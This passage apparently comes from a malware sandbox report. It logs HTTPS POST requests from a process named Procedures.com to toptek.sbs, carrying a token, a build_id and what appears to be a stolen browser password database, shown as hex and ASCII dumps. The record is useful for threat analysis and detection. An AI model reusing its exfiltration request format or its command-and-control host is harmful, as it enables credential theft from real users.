                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:03 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 49 45 55 4b 4e 47 4c 46 43 42 49 4d 59 55 53 52 51 49 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 49 45 55 4b 4e 47 4c 46 43 42 49 4d 59 55 53 52 51 49 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 49 45 55 4b 4e 47 4c 46 43 42 49 4d 59 55 53 52 51 49 35 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------IEUKNGLFCBIMYUSRQI5FContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------IEUKNGLFCBIMYUSRQI5FContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------IEUKNGLFCBIMYUSRQI5FCont
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:03 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:05 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:05 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  13192.168.2.54982794.130.188.574431576C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:05 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----P8QIECJ5XBIM7Y5XBAIE
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 55081
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:05 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 50 38 51 49 45 43 4a 35 58 42 49 4d 37 59 35 58 42 41 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 50 38 51 49 45 43 4a 35 58 42 49 4d 37 59 35 58 42 41 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 50 38 51 49 45 43 4a 35 58 42 49 4d 37 59 35 58 42 41 49 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------P8QIECJ5XBIM7Y5XBAIEContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------P8QIECJ5XBIM7Y5XBAIEContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------P8QIECJ5XBIM7Y5XBAIECont
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:05 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:05 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:07 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:07 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:07 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  14192.168.2.54983494.130.188.574431576C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:07 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----7YCBIE37YCBAIEC26FCB
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 142457
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:07 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 37 59 43 42 49 45 33 37 59 43 42 41 49 45 43 32 36 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 37 59 43 42 49 45 33 37 59 43 42 41 49 45 43 32 36 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 37 59 43 42 49 45 33 37 59 43 42 41 49 45 43 32 36 46 43 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------7YCBIE37YCBAIEC26FCBContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------7YCBIE37YCBAIEC26FCBContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------7YCBIE37YCBAIEC26FCBCont
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
